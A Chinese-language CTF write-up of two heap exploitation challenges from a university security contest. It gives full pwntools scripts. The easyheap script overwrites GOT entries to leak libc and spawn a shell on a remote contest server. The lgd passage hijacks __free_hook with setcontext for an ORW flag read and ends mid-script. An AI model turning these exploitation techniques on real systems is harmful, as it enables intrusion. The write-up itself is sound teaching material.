高校战“疫”网络安全分享赛pwn部分wp
easyheap
刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。
漏洞在申请的大小大于0x400时,return。这时ptr[i]
没有被释放,接下来就是常规劫持ptr[i]堆块上的指针为got表。修改got表。来实现利用。
```python
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
elf = ELF(flaag)
global p
if(debug == 1):
p = process(flaag)
else:
p = remote(ip,port)
def add(size,content):
p.sendlineafter("Your choice:\n","1")
p.sendlineafter("this message?\n",str(size))
p.sendafter("content of the message?\n",content)
def free(index):
p.sendlineafter("Your choice:\n","2")
p.sendlineafter("item to be deleted?\n",str(index))
def edit(index,content):
p.sendlineafter("Your choice:\n","3")
p.sendlineafter(" the item to be modified?\n",str(index))
p.sendafter("content of the message?\n",content)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
add(0x18,'\xff'*0x18)
free(0)
p.sendlineafter("Your choice:\n","1")
p.sendlineafter("this message?\n",str(0x500))
p.sendlineafter("Your choice:\n","1")
p.sendlineafter("this message?\n",str(0x500))
edit(0,p64(0)+p64(0x21)+p64(0x6020d8))
edit(1,p64(0x6020f0)+p64(0x602100)+p64(0)+p64(elf.got['free'])+p64(0x200)+p64(0x602108)+'/bin/sh\x00')
#gdb.attach(p)
edit(0,p64(0)+p64(0x21)+p64(elf.got['free']))
edit(1,p64(elf.plt['puts']))
edit(0,p64(0)+p64(0x21)+p64(elf.got['puts']))
free(1)
puts_addr=u64(p.recv(6).ljust(8,'\x00'))
libcbase_addr=puts_addr-libc.symbols['puts']
system_addr=libcbase_addr+libc.symbols['system']
binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
edit(3,p64(system_addr))
free(4)
print "system_addr=>",hex(system_addr)
print "libcbase_addr=>",hex(libcbase_addr)
p.interactive()
if __name__ == '__main__':
pwn('121.36.209.145',9997,0,'./easyheap')
lgd
开沙盒的堆溢出,老实说之前没遇到过这种。
在edit时read的长度为add时写在bss段字符串的长度。 造成了堆溢出。 利用堆溢出挟持__free_hook
为setcontext
,从而劫持rsp,rip
,从而劫持程序,在利用ORW来泄露flag
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
elf = ELF(flaag)
global p
if(debug == 1):
p = process(flaag)
else:
p = remote(ip,port)
def add(size,content):
p.sendlineafter(">> ","1")
p.sendlineafter("______?\n",str(size))
p.sendafter("yes_or_no?\n",content)
def free(index):
p.sendlineafter(">> ","2")
p.sendlineafter("index ?\n",str(index))
def show(index):
p.sendlineafter(">> ","3")
p.sendlineafter("index ?\n",str(index))
def edit(index,content):
p.sendlineafter(">> ","4")
p.sendlineafter("index ?\n",str(index))
p.sendafter("c___new_content ?\n",content)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p.sendlineafter("what is your name? \n","aaa")
add(0x50,"\xff"*0x200)
add(0xf8,'\xff'*0x200)
add(0x68,"\xff"*0x200)
free(1)
free(2)
edit(0,"A"*0x58+"B"*8)
show(0)
p.recvuntil("BBBBBBBB")
main_arena=u64(p.recv(6).ljust(8,"\x00"))
libcbase_addr=main_arena-(0x7f9f177d8b78-0x7f9f17414000)
free_hook=libcbase_addr+libc.symbols['__free_hook']
edit(0,"A"*0x58+p64(0x101)+p64(main_arena)+p64(free_hook-0x40)+p64(0)*28+p64(0x100)+p64(0x71)+p64(free_hook-0x33))
add(0xf8,'\xff'*0x200)
add(0x68,'\xff'*0x200)
add(0x68,'\xff'*0x200)
edit(3,p64(0)*4+'\x00'*3+p64(libcbase_addr+libc.symbols['setcontext']+0x35))
frame = SigreturnFrame()
frame.rdi = 0
frame.rax = 0
frame.